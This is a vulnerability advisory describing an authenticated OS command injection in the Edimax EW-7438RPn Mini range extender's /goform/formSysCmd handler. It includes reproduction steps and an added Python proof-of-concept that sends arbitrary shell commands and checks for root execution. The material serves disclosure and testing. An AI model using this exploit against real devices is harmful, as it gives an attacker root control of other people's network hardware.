Edimax EW-7438RPn Mini OS Command Injection Vulnerability Allowing Remote Code Execution

Vulnerability

An OS command injection vulnerability exists in the Edimax EW-7438RPn Mini Wi-Fi range extender, in firmware versions through 1.13. The /goform/formSysCmd endpoint, the form handler behind the syscmd.asp page, passes the value of the sysCmd parameter to the system shell without restricting which commands may be run. A remote attacker who can authenticate to the web interface can therefore send a crafted sysCmd value and execute arbitrary shell commands as root.

Impact

Successful exploitation gives an authenticated remote attacker arbitrary code execution on the affected device. Because the commands run as root, the attacker gains full control of the extender's operating system.

Reproduction

To reproduce the issue, confirm the target is running firmware 1.13 or earlier (the range this advisory covers), then authenticate to the device's web interface and open the syscmd.asp page. Submit a POST request to the /goform/formSysCmd endpoint with the sysCmd parameter set to the command to run. The device executes it on its operating system as root; a command such as id in the returned output confirms the privilege level.
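The following Python script is an added example of the reproduction steps above; it is not code from the advisory or from Edimax. The page only names the /goform/formSysCmd endpoint and the sysCmd parameter. Everything else is an assumption: that the web interface uses HTTP Basic authentication, that the form is submitted URL-encoded, that the response echoes the command output inside a <textarea> element, and the host, credentials and Referer header used.

```python
"""Reproduction helper for the Edimax EW-7438RPn Mini /goform/formSysCmd issue.

Added example, not part of the advisory. Assumptions not stated on the page:
- the web interface uses HTTP Basic authentication;
- the form is posted as application/x-www-form-urlencoded;
- the response echoes the command output inside a <textarea> element.
"""
import base64
import html
import re
import sys
import urllib.parse
import urllib.request

ENDPOINT = "/goform/formSysCmd"      # handler named in the advisory
FORM_PAGE = "/syscmd.asp"            # page that hosts the form (advisory)


def build_syscmd_request(host, command, username, password):
    """Build, but do not send, the POST that triggers command execution.

    Kept separate from the network call so the request can be inspected,
    proxied or replayed without touching a device.
    """
    body = urllib.parse.urlencode({"sysCmd": command}).encode()
    req = urllib.request.Request(f"http://{host}{ENDPOINT}", data=body, method="POST")
    # Assumption: HTTP Basic auth satisfies the "authenticated" requirement.
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Referer", f"http://{host}{FORM_PAGE}")  # assumption
    return req


# Assumption: command output is rendered inside a <textarea> on the response page.
_TEXTAREA = re.compile(r"<textarea[^>]*>(.*?)</textarea>", re.S | re.I)


def extract_output(page):
    """Pull the command output back out of the response HTML."""
    match = _TEXTAREA.search(page)
    return html.unescape(match.group(1)).strip() if match else ""


def looks_like_root(output):
    """True when `id` output reports uid 0, i.e. the command ran as root."""
    return re.search(r"\buid=0\(", output) is not None


def run_command(host, command, username, password, timeout=10):
    """Send the request to a live device and return the command output."""
    req = build_syscmd_request(host, command, username, password)
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return extract_output(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    # usage: python3 syscmd_poc.py <host> <username> <password>
    target, user, password = sys.argv[1:4]
    out = run_command(target, "id", user, password)
    print(out)
    print("runs as root:", looks_like_root(out))
```

extract_output will need adjusting if the device's page layout differs from the assumed textarea; build_syscmd_request is the part that carries the advisory's actual facts (the endpoint and the parameter name).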

Added: Jun 20, 2025, 9:59 PM
Updated: Jun 20, 2025, 9:59 PM

Vulnerability Rating

Custom Algorithm
spread          0.3
impact          7.5
exploitability  6.2
remediation     7.7
relevance       0.2
threat          6.5
urgency         2.9
incentive       0.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.